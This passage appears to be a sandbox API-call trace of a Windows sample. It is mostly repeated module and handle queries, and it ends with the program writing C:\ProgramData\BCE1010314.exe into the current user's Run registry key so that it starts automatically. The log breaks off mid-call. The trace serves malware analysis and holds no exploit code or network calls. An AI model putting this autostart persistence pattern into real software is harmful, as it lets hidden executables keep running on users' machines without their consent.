hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.163] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.163] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.163] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.164] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.164] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.164] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.164] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.164] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.164] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.164] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.164] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.164] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.164] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.164] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.165] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.165] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.165] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.165] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.165] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.165] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.165] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.165] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.165] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.165] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.165] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.165] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.166] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.166] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.166] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.166] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.166] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.166] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.166] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.166] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.166] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.167] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.167] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.167] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.167] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.167] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.167] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.167] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.167] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.168] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.168] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.168] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.168] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.168] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.168] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.168] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.168] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.168] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.168] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.168] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.168] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.169] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.169] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.169] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.169] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.169] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.169] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.169] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.169] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.169] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.169] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.169] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.169] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.170] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.170] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.170] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.170] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.170] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.170] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.170] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.170] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.245] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.246] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.246] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.246] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.246] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.246] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.246] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.246] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.246] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.246] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.246] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.246] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.246] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.246] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.246] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.247] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.247] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.247] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.247] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.247] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.247] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.247] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.247] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.247] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.247] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.247] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.247] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.247] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.248] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.248] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.248] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.248] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.248] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.248] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.248] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.248] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.248] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.249] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.249] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.249] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.249] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.249] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.249] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.249] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.249] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.249] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.249] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.249] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.249] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.249] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.249] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.249] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.250] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.250] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.250] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.250] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.250] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.250] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.250] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.250] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.250] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.250] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.250] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.250] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.251] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.251] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.251] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.251] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.251] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.251] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.251] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.251] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.251] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.252] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.252] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.252] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.252] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.252] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.252] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.252] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.252] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.252] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.252] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.253] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.253] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.253] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.253] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.253] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.253] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.253] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.253] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.254] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.254] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.254] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.254] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.254] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.254] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.254] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.254] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.254] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.254] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.254] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.254] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.254] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.254] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.255] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.255] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.255] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.255] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.255] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.255] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.255] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.255] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.255] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.255] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.255] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.255] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.255] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.256] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.256] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.256] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.256] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.256] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.256] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.256] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.256] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.256] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.256] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.256] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.256] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.257] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.257] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.257] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.257] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.257] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.257] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.257] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.257] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.257] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.257] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.257] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.257] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.258] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.258] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.258] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.258] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.258] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.258] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.258] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.258] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.258] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.259] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.259] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.259] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.259] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.259] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.259] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.259] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.259] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.259] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.259] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.259] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.259] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.260] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.260] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.260] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.260] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.260] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.260] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.260] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.260] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.260] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.260] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.260] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.260] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.261] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.261] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.261] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.261] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.261] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.261] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.261] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.261] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.261] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.261] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.261] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.262] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.262] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.262] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.262] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.262] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.262] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.262] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.262] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.262] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.262] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.263] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.263] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.263] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.263] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.263] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.263] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.263] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.263] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.263] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.263] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.263] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.263] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.264] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.264] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.264] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.264] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.264] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.264] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.264] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.264] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.264] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.264] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.264] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.264] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.265] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.265] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.336] wsprintfW (in: param_1=0x180968, param_2="\"%s\"" | out: param_1="\"C:\\ProgramData\\BCE1010314.exe\"") returned 31 [0092.336] GetUserNameW (in: lpBuffer=0x180558, pcbBuffer=0x180348 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180348) returned 1 [0092.336] wsprintfW (in: param_1=0x180350, param_2="00FF%08X" | out: param_1="00FFE1010314") returned 12 [0092.336] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18034c | out: phkResult=0x18034c*=0x26c) returned 0x0 [0092.336] RegSetValueExW (in: hKey=0x26c, lpValueName="00FFE1010314", Reserved=0x0, dwType=0x1, lpData="\"C:\\ProgramData\\BCE1010314.exe\"", cbData=0x3e | out: lpData="\"C:\\ProgramData\\BCE1010314.exe\"") returned 0x0 [0092.337] RegFlushKey (hKey=0x26c) returned 0x0 [0092.661] RegCloseKey (hKey=0x26c) returned 0x0 [0092.661] GetUserNameW (in: lpBuffer=0x180968, pcbBuffer=0x180758 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180758) returned 1 [0092.661] wsprintfW (in: param_1=0x180760, param_2="BC%08X" | out: param_1="BCE1010314") returned 10 [0092.661] RegOpenKeyW (in: hKey=0x80000001, 